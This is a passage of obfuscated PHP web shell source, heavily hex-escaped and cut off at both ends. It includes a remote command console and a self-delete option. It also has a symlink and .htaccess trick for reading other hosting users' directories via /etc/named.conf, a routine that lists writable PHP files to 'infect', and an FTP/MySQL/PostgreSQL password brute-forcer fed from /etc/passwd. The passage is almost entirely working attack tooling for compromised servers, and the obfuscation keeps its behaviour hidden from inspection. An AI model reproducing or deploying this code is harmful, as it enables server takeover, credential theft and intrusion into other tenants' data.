fil\\x65)\\x3c/s\\x70\\x61\\x6e\\x3e\\nif(w\\x69n\\x64\\x6fw\\x2eE\\x76en\\x74) w\\x69n\\x64\\x6f\\x77.\\x63\\x61\\x70t\\x75\\x72\\x65\\x45\\x76en\\x74\\x73(E\\x76ent\\x2eK\\x45Y\\x44OW\\x4e)\\x3b\\n\\x76a\\x72 cmds\\x20\\x3d\\x20n\\x65w\\x20Ar\\x72ay(\\\"\\\");\\nv\\x61\\x72\\x20\\x63\\x75r\\x20\\x3d\\x200;\\n\\x66\\x75\\x6e\\x63t\\x69\\x6f\\x6e k\\x70(\\x65)\\x20{\\n\\t\\x76\\x61\\x72\\x20\\x6e\\x20= (\\x77\\x69\\x6edow.Eve\\x6e\\x74)\\x20? \\x65\\x2e\\x77hich\\x20: e\\x2ek\\x65\\x79Code\\x3b\\n\\t\\x69f(\\x6e \\x3d= 38) {\\n\\t\\tc\\x75\\x72--\\x3b\\n\\t\\tif(\\x63\\x75\\x72>=\\x30)\\n\\t\\t\\t\\x64oc\\x75\\x6de\\x6e\\x74\\x2ecf.c\\x6d\\x64\\x2e\\x76a\\x6c\\x75\\x65\\x20= cm\\x64\\x73[\\x63u\\x72];\\n\\t\\t\\x65\\x6cs\\x65\\n\\t\\t\\t\\x63\\x75\\x72++\\x3b\\n\\t} \\x65\\x6cs\\x65 if(\\x6e\\x20=\\x3d \\x34\\x30) {\\n\\t\\tcur++;\\n\\t\\t\\x69\\x66(c\\x75\\x72\\x20\\x3c \\x63m\\x64\\x73\\x2elen\\x67th)\\n\\t\\t\\t\\x64o\\x63um\\x65nt.\\x63f\\x2e\\x63\\x6d\\x64\\x2eval\\x75\\x65 \\x3d\\x20c\\x6dds[\\x63\\x75r]\\x3b\\n\\t\\te\\x6cs\\x65\\n\\t\\t\\tcur--\\x3b\\n\\t}\\n}\\nf\\x75n\\x63ti\\x6fn \\x61\\x64d(c\\x6dd) {\\n\\tcmd\\x73\\x2epo\\x70()\\x3b\\n\\t\\x63\\x6dds.\\x70us\\x68(cm\\x64);\\n\\tc\\x6dds\\x2e\\x70\\x75sh(\\\"\\\");\\n\\t\\x63u\\x72\\x20\\x3d\\x20\\x63mds\\x2e\\x6c\\x65n\\x67\\x74h-1\\x3b\\n}\\n\\n\\n\";$rjvknpts=\"\\x76\";echo\"
Con\\x73\\x6f\\x6c\\x65\\x3c/h1>\\x3cd\\x69\\x76 \\x63\\x6c\\x61s\\x73\\x3d\\x63\\x6fnt\\x65nt\\x3e\\x3cf\\x6f\\x72m\\x20name\\x3d\\x63f \\x6fnsu\\x62m\\x69\\x74\\x3d\\\"if(\\x64\\x6f\\x63\\x75\\x6d\\x65nt\\x2ec\\x66\\x2ec\\x6d\\x64.\\x76a\\x6cue\\x3d\\x3d\\x27cl\\x65\\x61r'){\\x64\\x6f\\x63\\x75m\\x65n\\x74.\\x63\\x66\\x2eo\\x75\\x74p\\x75\\x74\\x2e\\x76\\x61l\\x75\\x65='\\x27\\x3b\\n\\x64\\x6fcum\\x65nt\\x2ec\\x66\\x2ecm\\x64\\x2e\\x76\\x61l\\x75e='\\x27\\x3b\\n\\x72\\x65tu\\x72n \\x66al\\x73\\x65\\x3b\\n}add(t\\x68i\\x73.c\\x6d\\x64\\x2e\\x76\\x61lue);\\ni\\x66(t\\x68\\x69s.\\x61\\x6aa\\x78.\\x63he\\x63\\x6b\\x65\\x64){\\x61(nu\\x6c\\x6c,\\x6e\\x75l\\x6c,this.c\\x6d\\x64\\x2eva\\x6cue);\\n}e\\x6c\\x73\\x65{g(\\x6eu\\x6c\\x6c,n\\x75l\\x6c,\\x74h\\x69s.cm\\x64.\\x76\\x61lue)\\x3b\\n}\\x20return \\x66\\x61lse;\\n\\\"\\x3e\\x3c\\x73\\x65\\x6cec\\x74 \\x6eam\\x65\\x3d\\x61li\\x61\\x73\\x3e\";foreach($GLOBALS[\"a\\x6c\\x69a\\x73\\x65s\"]as${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6ae\\x79e\\x6ae\\x6av\\x65s\"]}=>${$rjvknpts}){${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"s\\x73\\x69e\\x6ej\\x69s\"]=\"\\x76\";if(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"ssie\\x6e\\x6a\\x69\\x73\"]}==\"\"){echo\"\\x3c\\x6f\\x70t\\x67r\\x6fup\\x20la\\x62\\x65\\x6c\\x3d\\\"-\".htmlspecialchars(${${\"GL\\x4f\\x42ALS\"}[\"j\\x65\\x79\\x65\\x6ae\\x6a\\x76\\x65\\x73\"]}).\"-\\\"> se\\x6ed\\x20\\x75\\x73\\x69\\x6eg\\x20A\\x4a\\x41\\x58<\\x62r/>\\x3c\\x74\\x65x\\x74area \\x63la\\x73s\\x3db\\x69\\x67\\x61\\x72\\x65a n\\x61m\\x65\\x3d\\x6f\\x75tp\\x75t \\x73t\\x79\\x6ce=\\x22\\x62\\x6f\\x72\\x64er-b\\x6f\\x74tom:\\x30\\x3b\\nm\\x61rgi\\x6e:\\x30;\\n\\x22\\x20rea\\x64only>\";if(!empty($_POST[\"\\x701\"])){echo htmlspecialchars(\"\\$ \".$_POST[\"\\x70\\x31\"].\"\\n\".ex($_POST[\"p\\x31\"]));}echo\"\\x3c\\x69n\\x70ut \\x74y\\x70\\x65=t\\x65\\x78\\x74 name=cm\\x64\\x20sty\\x6ce\\x3d\\x22\\x62or\\x64\\x65r-\\x74o\\x70:0\\x3b\\nw\\x69d\\x74h:\\x3100\\x25;\\n\\x6da\\x72g\\x69n:\\x30;\\n\\x22 \\x6f\\x6e\\x6b\\x65\\x79do\\x77n=\\\"k\\x70(\\x65\\x76e\\x6e\\x74);\\n\\\"\\x3e\";echo\"\";printFooter();}function actionLogout(){unset($_SESSION[md5($_SERVER[\"HT\\x54\\x50_\\x48\\x4fS\\x54\"])]);echo\"bye!\";}function actionSelfRemove(){printHeader();if($_POST[\"\\x701\"]==\"ye\\x73\"){if(@unlink(SELF_PATH))die(\"\\x53\\x68\\x65ll\\x20\\x68a\\x73 b\\x65\\x65n rem\\x6f\\x76e\\x64\");else echo\"\\x75\\x6elink \\x65\\x72r\\x6fr\\x21\";}echo\"<\\x68\\x31>\\x53uicid\\x65\\x3c/\\x681><\\x64iv\\x20clas\\x73=co\\x6e\\x74\\x65nt>Re\\x61\\x6c\\x6cy\\x20w\\x61nt t\\x6f re\\x6d\\x6f\\x76\\x65\\x20\\x74\\x68\\x65\\x20s\\x68\\x65l\\x6c?<\\x62r>\";printFooter();}function actionTools(){printHeader();printFooter();}function actionDomains(){${\"G\\x4cOBA\\x4cS\"}[\"\\x6ft\\x6e\\x64\\x6d\\x63\\x6b\"]=\"\\x63\";printHeader();$czenigt=\"\\x640\\x6d\\x61\\x69ns\";error_reporting(0);echo\"<\\x74itl\\x65\\x3e\\x23D\\x6f\\x6da\\x69n\\x73 &\\x20\\x55se\\x72s\\x3c/\\x74\\x69\\x74l\\x65\\x3e\";mkdir(\"s\\x79\\x6d\");symlink(\"/\",\"\\x30/\\x78\\x2et\\x78t\");${${\"G\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6ft\\x6e\\x64\\x6dck\"]}=\"O\\x70\\x74\\x69o\\x6es I\\x6ed\\x65\\x78\\x65s F\\x6fllow\\x53\\x79\\x6dLinks \\n Dir\\x65\\x63to\\x72yI\\x6e\\x64\\x65x\\x20s\\x73ss\\x73s.\\x68t\\x6d \\n Ad\\x64\\x54y\\x70\\x65 \\x74x\\x74 .ph\\x70 \\n A\\x64\\x64\\x48andle\\x72 tx\\x74 .\\x70\\x68p\\x20\\n \\x41d\\x64\\x54\\x79p\\x65 t\\x78t\\x20.h\\x74\\x6d\\x6c \\n\\x20\\x41dd\\x48andler\\x20\\x74xt .h\\x74m\\x6c \\n O\\x70t\\x69\\x6f\\x6e\\x73 a\\x6c\\x6c\\x20\\n \\x4fptio\\x6es \\n \\x41ll\\x6f\\x77 from \\x61ll \\n \\x52\\x65q\\x75\\x69\\x72\\x65\\x20\\x4e\\x6fne\\x20\\n\\x20Sa\\x74\\x69\\x73\\x66y\\x20\\x41\\x6ey\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"s\\x6c\\x70e\\x6c\\x63\"]}=fopen(\"s\\x79\\x6d/\\x2ehtac\\x63e\\x73\\x73\",\"w\");fwrite(${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x73\\x6c\\x70e\\x6cc\"]},${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"fm\\x75\\x6a\\x6f\\x6am\\x6fl\"]});${${\"\\x47LO\\x42\\x41\\x4c\\x53\"}[\"\\x66\\x67\\x65mo\\x75\\x64\\x66p\\x65g\"]}=@file(\"/e\\x74\\x63/\\x6e\\x61\\x6de\\x64\\x2e\\x63\\x6f\\x6e\\x66\");if(!${$czenigt}){die(\"<\\x62\\x3e#\\x45\\x72r\\x6fr\\x2e.. -\\x3e [\\x20/e\\x74\\x63/\\x6e\\x61me\\x64\\x2ec\\x6fnf\\x20]\");}echo\"\\x3ct\\x61ble al\\x69gn=\\x63\\x65\\x6et\\x65\\x72\\x20bord\\x65\\x72=\\x31\\x3e\\n\\x3ctd\\x3e\\x55ser\\x20L\\x69s\\x74 \\x53yml\\x69\\x6ek\";foreach(${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x66g\\x65\\x6d\\x6f\\x75\\x64f\\x70\\x65\\x67\"]} as${${\"\\x47\\x4cO\\x42A\\x4cS\"}[\"yk\\x70\\x6c\\x64\\x76\\x64\\x76\\x73\"]}){$rtspplextfa=\"\\x64\\x30ma\\x69n\";if(eregi(\"\\x7a\\x6f\\x6ee\",${$rtspplextfa})){preg_match_all(\"\\x23zone\\x20\\\"(.*)\\x22#\",${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x79k\\x70\\x6cdv\\x64\\x76\\x73\"]},${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x79\\x66h\\x7a\\x76\\x77\\x73w\"]});flush();if(strlen(trim(${${\"G\\x4cOBA\\x4c\\x53\"}[\"\\x79\\x66\\x68\\x7a\\x76\\x77\\x73\\x77\"]}[1][0]))>2){${\"G\\x4c\\x4fBAL\\x53\"}[\"\\x6ar\\x79\\x68\\x74\\x6eiqab\\x6a\"]=\"u\\x73\\x65\\x72\";$fcjtfmbcs=\"\\x64\\x6f\\x6da\\x69\\x6e\\x73\";${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"\\x64\\x76\\x65q\\x69\\x73\"]}=posix_getpwuid(@fileowner(\"/\\x65tc/v\\x61\\x6ci\\x61s\\x65\\x73/\".${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"y\\x66\\x68z\\x76w\\x73\\x77\"]}[1][0]));echo\"<\\x74\\x72\\x3e\\x3ctd\\x3e\\x3c/td\\x3e\\x3c\\x74\\x64\\x3e\".${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"j\\x72\\x79ht\\x6e\\x69\\x71\\x61bj\"]}[\"\\x6ea\\x6d\\x65\"].\"\\x3c\\x61 \\x68\\x72\\x65\\x66='s\\x79m/\\x78\\x2e\\x74\\x78t/h\\x6f\\x6de/\".${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x76\\x65\\x71\\x69\\x73\"]}[\"n\\x61\\x6d\\x65\"].\"/\\x70ublic\\x5fh\\x74\\x6dl\\x27>\\x4d\\x69r\\x65\\x6dos\";flush();}}}echo\"\\x46\\x61ilR\\x6fo\\x74-\\x53\\x65\\x63.\\x43\\x6f\\x6d\\x20|\\x20<\\x61 \\nh\\x72\\x65\\x66\\x3d\\x27\\x68t\\x74\\x70://\\x77\\x57\\x77.s\\x45\\x634Ev\\x45\\x72\\x2eCo\\x4d/\\x27>wW\\x77\\x2es\\x45c4EvEr\\x2e\\x43\\x6fM\\x20\\n\\x3c/p\\x3e \\n\";printFooter();}function actionInfect(){printHeader();echo\"\";if($_POST[\"\\x701\"]==\"i\\x6ef\\x65\\x63t\"){$ukelmo=\"t\\x61\\x72\\x67\\x65\\x74\";${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x63\\x68\\x6fyu\\x76\\x72\\x64\\x66s\"]}=$_SERVER[\"\\x44\\x4f\\x43UME\\x4e\\x54\\x5f\\x52O\\x4fT\"];function ListFiles($dir){${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"\\x70\\x61w\\x6fo\\x76\\x79cg\\x74\\x75\"]=\"\\x64\\x69\\x72\";if(${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x78\\x6e\\x68\\x6e\\x76fo\\x66\\x62r\"]}=opendir(${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x70\\x61\\x77\\x6f\\x6f\\x76ycg\\x74\\x75\"]})){$odsjqd=\"\\x66\\x69\\x6c\\x65s\";$ewjcsclizqmf=\"d\\x68\";${$odsjqd}=Array();${${\"\\x47\\x4c\\x4fB\\x41L\\x53\"}[\"\\x63\\x75\\x64a\\x76u\"]}=Array();while(${${\"\\x47LOB\\x41L\\x53\"}[\"\\x78\\x64\\x6e\\x74\\x6b\\x6c\\x6c\\x70\\x6ai\"]}=readdir(${${\"GLOBALS\"}[\"\\x78n\\x68n\\x76f\\x6ff\\x62\\x72\"]})){$onfpvvtx=\"\\x66i\\x6c\\x65\";if(${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x78\\x64n\\x74k\\x6c\\x6c\\x70\\x6ai\"]}!=\".\"&&${$onfpvvtx}!=\"\\x2e.\"){$akvroey=\"\\x66i\\x6ce\";${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"dn\\x6b\\x73\\x65mr\\x74\\x65\"]=\"\\x64i\\x72\";if(is_dir(${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x64\\x6e\\x6bs\\x65mr\\x74\\x65\"]}.\"/\".${$akvroey})){$bhiirbjs=\"\\x69\\x6e\\x6e\\x65r\\x5f\\x66\\x69\\x6c\\x65s\";$mgxxfxobjoc=\"fi\\x6c\\x65\";$yjbhqjq=\"\\x66\\x69\\x6ce\\x73\";${$bhiirbjs}=ListFiles(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"u\\x6fh\\x79l\\x6b\\x77\\x67\"]}.\"/\".${$mgxxfxobjoc});if(is_array(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"c\\x75d\\x61\\x76\\x75\"]}))${$yjbhqjq}=array_merge(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x75\\x6d\\x77gvd\\x67\\x65\"]},${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x63\\x75\\x64\\x61vu\"]});}else{$exwrpjuo=\"\\x64\\x69\\x72\";$dnuxvemfe=\"\\x66i\\x6ce\";array_push(${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x75m\\x77\\x67v\\x64\\x67e\"]},${$exwrpjuo}.\"/\".${$dnuxvemfe});}}}closedir(${$ewjcsclizqmf});return${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"um\\x77\\x67\\x76d\\x67e\"]};}}foreach(ListFiles(${$ukelmo})as${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x62\\x73k\\x63\\x71\\x68\\x68\"]}=>${${\"G\\x4cOBA\\x4c\\x53\"}[\"x\\x64nt\\x6b\\x6cl\\x70\\x6a\\x69\"]}){$jmpwduwn=\"nFil\\x65\";$skqdmqjx=\"\\x6e\\x46\\x69\\x6c\\x65\";${$skqdmqjx}=substr(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x78\\x64ntk\\x6c\\x6c\\x70\\x6ai\"]},-4,4);if(${$jmpwduwn}==\"\\x2e\\x70h\\x70\"){$oidtklxjj=\"\\x66\\x69\\x6c\\x65\";${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x62\\x70\\x78\\x63\\x63\\x6f\\x64\\x64\\x65\"]=\"\\x66i\\x6ce\";if((${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x62\\x70\\x78\\x63c\\x6f\\x64\\x64\\x65\"]}<>$_SERVER[\"\\x44\\x4f\\x43U\\x4dENT_R\\x4fOT\"].$_SERVER[\"\\x50\\x48P_S\\x45\\x4cF\"])&&(is_writeable(${$oidtklxjj}))){$ojkuqaweu=\"i\";echo\"$file\\x3cbr\\x3e\";${$ojkuqaweu}++;}}}echo\"$i\\x3c/f\\x6f\\x6e\\x74>\";}else{echo\"\\x3cfor\\x6d\\x20met\\x68\\x6fd=\\x70\\x6f\\x73t>\";echo\"Rea\\x6cly w\\x61n\\x74 t\\x6f infect \\x74\\x68\\x65\\x20\\x73e\\x72\\x76\\x65r?\\x26\\x6e\\x62s\\x70\\x3b\\n\";}printFooter();}function actionBruteforce(){printHeader();if(isset($_POST[\"\\x70rot\\x6f\"])){$xmhhpmytla=\"\\x61\\x74\\x74em\\x70\\x74s\";echo\"\\x3c\\x68\\x31\\x3eRe\\x73\\x75lt\\x73<\\x64\\x69\\x76 cl\\x61s\\x73\\x3d\\x63\\x6fnt\\x65n\\x74>\\x3cs\\x70\\x61n\\x3e\\x54y\\x70\\x65: \".htmlspecialchars($_POST[\"\\x70\\x72\\x6f\\x74\\x6f\"]).\" <\\x73\\x70\\x61n>S\\x65\\x72\\x76e\\x72:\\x3c/s\\x70\\x61n\\x3e \".htmlspecialchars($_POST[\"server\"]).\"<\\x62\\x72\\x3e\";${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"o\\x63dkn\\x65\\x6cy\\x69\"]=\"s\\x75\\x63\\x63\\x65\\x73s\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66fmp\\x7aq\\x78\\x70n\"]=\"s\\x65r\\x76\\x65r\";if($_POST[\"\\x70roto\"]==\"f\\x74\\x70\"){function bruteForce($ip,$port,$login,$pass){${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x67c\\x75m\\x68y\\x66\\x6d\\x74\\x65h\"]=\"por\\x74\";$wjulivyfhddl=\"f\\x70\";${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"c\\x77\\x6f\\x73\\x6b\\x69\\x62\"]=\"\\x72\\x65\\x73\";${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70\\x67\\x6ek\\x71\\x70\\x6b\"]}=@ftp_connect(${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"r\\x6d\\x78oj\\x76\"]},${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"g\\x63u\\x6dh\\x79\\x66\\x6dt\\x65\\x68\"]}?${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6cc\\x71\\x72\\x77\\x63\\x66\"]}:21);if(!${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"j\\x65obfp\\x67\\x6e\\x6bq\\x70k\"]})return false;${${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"cwo\\x73k\\x69\\x62\"]}=@ftp_login(${${\"\\x47L\\x4f\\x42\\x41LS\"}[\"\\x6aeo\\x62\\x66\\x70\\x67\\x6ek\\x71\\x70k\"]},${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"d\\x79\\x61w\\x76\\x63\\x67\"]},${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"\\x64or\\x6d\\x6f\\x7au\"]});@ftp_close(${$wjulivyfhddl});return${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"l\\x6d\\x6e\\x79e\\x7a\"]};}}elseif($_POST[\"\\x70r\\x6f\\x74\\x6f\"]==\"m\\x79\\x73q\\x6c\"){function bruteForce($ip,$port,$login,$pass){${\"G\\x4cOBAL\\x53\"}[\"\\x71y\\x75\\x65\\x74\\x68\\x74\\x64\\x64w\\x79\"]=\"\\x69\\x70\";$hprhczelywn=\"p\\x6f\\x72t\";$gpkgzmtadr=\"r\\x65\\x73\";${$gpkgzmtadr}=@mysql_connect(${${\"\\x47LO\\x42ALS\"}[\"q\\x79u\\x65\\x74\\x68t\\x64\\x64w\\x79\"]}.\":\".${$hprhczelywn}?${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6c\\x63\\x71\\x72\\x77\\x63\\x66\"]}:3306,${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x79a\\x77v\\x63g\"]},${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"d\\x6f\\x72\\x6d\\x6f\\x7a\\x75\"]});@mysql_close(${${\"\\x47L\\x4fBAL\\x53\"}[\"l\\x6d\\x6ey\\x65z\"]});return${${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"\\x6c\\x6dn\\x79\\x65\\x7a\"]};}}elseif($_POST[\"p\\x72ot\\x6f\"]==\"\\x70\\x67\\x73\\x71\\x6c\"){function bruteForce($ip,$port,$login,$pass){${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x74u\\x74\\x72\\x77\\x67k\\x6f\\x78\"]=\"r\\x65s\";$wqwkkylcwxi=\"\\x73t\\x72\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x64\\x64p\\x6a\\x72\\x76\"]=\"\\x6c\\x6f\\x67i\\x6e\";${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6c\\x67v\\x6d\\x6e\\x62\\x6c\\x78b\\x6b\\x6fj\"]=\"\\x69\\x70\";$xhnquwkvu=\"\\x73\\x65\\x72\\x76e\\x72\";${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x71\\x79\\x79\\x6d\\x70\\x66\\x78\\x66d\\x77\\x6fs\"]=\"\\x70\\x6f\\x72\\x74\";$nwioycyjrrto=\"p\\x61\\x73\\x73\";${$wqwkkylcwxi}=\"\\x68\\x6f\\x73\\x74='\".${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"\\x6c\\x67v\\x6d\\x6e\\x62l\\x78b\\x6b\\x6f\\x6a\"]}.\"'\\x20p\\x6f\\x72\\x74=\\x27\".${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"q\\x79\\x79\\x6d\\x70\\x66\\x78\\x66\\x64\\x77\\x6f\\x73\"]}.\"'\\x20\\x75\\x73e\\x72='\".${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"d\\x79\\x61\\x77\\x76c\\x67\"]}.\"'\\x20\\x70\\x61\\x73sw\\x6f\\x72d\\x3d\\x27\".${$nwioycyjrrto}.\"\\x27\\x20\\x64b\\x6eame\\x3d''\";${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6c\\x6d\\x6ey\\x65\\x7a\"]}=@pg_connect(${$xhnquwkvu}[0].\":\".${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x71\\x73t\\x78\\x68\\x75\\x64\\x6d\"]}[1]?${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x71s\\x74\\x78\\x68\\x75\\x64m\"]}[1]:5432,${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x64d\\x70j\\x72\\x76\"]},${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"d\\x6frmo\\x7au\"]});@pg_close(${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"tutrwg\\x6bo\\x78\"]});return${${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"l\\x6d\\x6eye\\x7a\"]};}}${${\"\\x47LOBA\\x4cS\"}[\"\\x6f\\x63\\x64k\\x6ee\\x6c\\x79\\x69\"]}=0;${$xmhhpmytla}=0;${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"\\x66\\x66m\\x70z\\x71\\x78\\x70\\x6e\"]}=explode(\":\",$_POST[\"\\x73\\x65\\x72v\\x65\\x72\"]);if($_POST[\"t\\x79p\\x65\"]==1){$cectqy=\"\\x74emp\";${$cectqy}=@file(\"/\\x65t\\x63/p\\x61\\x73s\\x77d\");if(is_array(${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x70\\x72kk\\x77n\\x6a\\x65\"]})){foreach(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"pr\\x6bk\\x77n\\x6a\\x65\"]} as${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"x\\x70v\\x69tc\\x78\"]}){${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72\\x78y\\x74d\\x65\"]=\"\\x6ci\\x6e\\x65\";$kqozytn=\"\\x73\\x65\\x72\\x76\\x65\\x72\";$rvizdtbzpq=\"\\x6c\\x69n\\x65\";${${\"\\x47LO\\x42\\x41L\\x53\"}[\"x\\x70v\\x69\\x74\\x63\\x78\"]}=explode(\":\",${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x70rxyt\\x64\\x65\"]});++${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"u\\x64l\\x64\\x75\\x74\\x73\\x75\"]};if(bruteForce(@${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x71s\\x74\\x78\\x68ud\\x6d\"]}[0],@${$kqozytn}[1],${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"\\x78\\x70v\\x69\\x74\\x63x\"]}[0],${$rvizdtbzpq}[0])){${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"vc\\x65\\x77bwqp\\x6e\"]=\"\\x6c\\x69\\x6e\\x65\";${\"\\x47\\x4cOBALS\"}[\"b\\x6a\\x67\\x76\\x75\\x75\\x6f\"]=\"\\x73\\x75cc\\x65s\\x73\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"i\\x70mo\\x76g\\x70\\x67\"]=\"\\x6cin\\x65\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x62\\x6ag\\x76uuo\"]}++;echo\"\".htmlspecialchars(${${\"G\\x4c\\x4fBA\\x4cS\"}[\"i\\x70mo\\x76g\\x70\\x67\"]}[0]).\":\".htmlspecialchars(${${\"\\x47L\\x4fBA\\x4c\\x53\"}[\"\\x76c\\x65w\\x62\\x77qpn\"]}[0]).\"\";}if(@$_POST[\"r\\x65v\\x65r\\x73e\"]){$nhpweqpdqte=\"\\x69\";${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"h\\x62\\x75jv\\x6f\\x63\"]=\"\\x69\";$emcarib=\"li\\x6ee\";${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x62n\\x66i\\x74j\"]}=\"\";for(${$nhpweqpdqte}=strlen(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x78p\\x76\\x69\\x74c\\x78\"]}[0])-1;${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"u\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63\\x62\"]}>=0;--${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"h\\x62\\x75\\x6a\\x76\\x6fc\"]})${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x62n\\x66\\x69\\x74\\x6a\"]}.=${$emcarib}[0][${${\"GL\\x4f\\x42A\\x4cS\"}[\"ubjg\\x6d\\x69\\x79\\x76s\\x63\\x62\"]}];++${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x75\\x64l\\x64ut\\x73u\"]};if(bruteForce(@${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"qs\\x74x\\x68u\\x64m\"]}[0],@${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x71\\x73t\\x78\\x68u\\x64\\x6d\"]}[1],${${\"G\\x4c\\x4f\\x42ALS\"}[\"\\x78\\x70\\x76\\x69t\\x63x\"]}[0],${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x62nf\\x69\\x74j\"]})){${${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"\\x6an\\x68\\x70\\x6d\\x70i\\x6d\\x63\\x61\"]}++;echo\"\\x3cb\\x3e\".htmlspecialchars(${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x78\\x70\\x76\\x69\\x74\\x63\\x78\"]}[0]).\"S\\x75c\\x63\\x65\\x73s:\\x20$success\\x3c/div>
\";}echo\"\\x3ch\\x31\\x3e\\x46\\x54P\\x20\\x62r\\x75t\\x65\\x66o\\x72c\\x65\\x3cdiv\\x20cl\\x61s\\x73=\\x63\\x6fn\\x74\\x65nt\\x3e<\\x73\\x70\\x61n\\x3eT\\x79p\\x65\\x3co\\x70\\x74io\\x6e\\x20\\x76\\x61l\\x75\\x65\\x3dmy\\x73ql\\x3eM\\x79\\x53ql<\\x6fpt\\x69\\x6f\\x6e\\x20\\x76al\\x75e\\x3d\\x70\\x67\\x73q\\x6c\\x3e\\x50\\x6f\\x73\\x74g\\x72e\\x53q\\x6c\\x3c/\\x74r\\x3e\\x3ct\\x72\\x3e<\\x74\\x64>\".\"\\x3c/t\\x64>\".\"\\x3c\\x74d\\x3e\\x3c\\x69\\x6epu\\x74\\x20t\\x79\\x70\\x65\\x3dt\\x65\\x78\\x74\\x20n\\x61\\x6d\\x65\\x3d\\x73\\x65\\x72\\x76e\\x72\\x20\\x76a\\x6c\\x75\\x65\\x3d\\\"1\\x32\\x37\\x2e0\\x2e0\\x2e1\\\